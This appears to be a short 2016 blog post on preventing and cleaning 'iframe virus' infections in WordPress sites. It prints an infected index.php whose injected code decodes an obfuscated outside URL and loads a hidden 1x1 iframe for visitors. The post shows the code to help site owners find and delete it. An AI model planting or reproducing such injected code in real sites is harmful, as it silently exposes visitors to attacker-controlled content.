Last updated on May 13th, 2016 at 12:35 pm
WordPress Iframe virus / Malware fix
Iframe malware are very much popular among wordpress websites. The webmasters who use wordpress as their back end have to spend most of their valuable time searching for these virus once affected and most of the time they end up in shutting down their website.
[If they do not have a habit of taking incremental backups]
Here are some tips how to prevent your website from these virus attacks.
1)Always take incremental backups.
2)Always scan your local computer / Test box before uplaoding data/files to your web-host through ftp or any other methods.
3)Usually these virus resides in your computer and they will hack all your local files and executables. Ftp softwares are attacked and all the files you upload to your host will be edited by these virus accordingly.
4)If you have a wordpress based website then you should be really careful while uploading the data as these virus may even crack your DB info and corrupt it [Least possibility but why to take a chance]
5)Always update your local computer / Test box with latest antivirus definitions.
6)Always better to have a firewall installed on your local computer / Test box. This will alert you whenever there is a malicious activity. I recommend AVG Firewall /Antivirus.Your wish 🙂
7)Install antivirus on your website. This will scan your themes, which is one of the most vulnerable area in wordpress.
Things to do once your website is infected with these virus
1)Check your index.php in the wordpress install root directory.
2)Check for any change in configuration of the wordpress.
3) A simple example of a corrupted index.php
< ?php /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define('WP_USE_THEMES', true); /** Loads the WordPress Environment and Template */ require('./wp-blog-header.php'); $domen = file_get_contents(base64_decode('aHR0cDovL2JpZDRnZXQuY29tL2xpL2JiZTE1ZDc3ZTI0NTVjYjQyYmUyYjRhMjk5MDU0OWU0')); ?> <iframe src="http://<?php echo($domen);?>/index.php?tp=4069e0e648d6b2da" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>?>
You can see an iframe injected @ the footer of the above file.That is a virus 🙂 . Delete the code from the iframe tag and also the variable above that is assigned to file_get_contents. Still if its not working restore the previous backup of index.php.
4)Always make sure your DB is not corrupted.
5)If your DB is corrupted the only way is the restore it with the best backup available.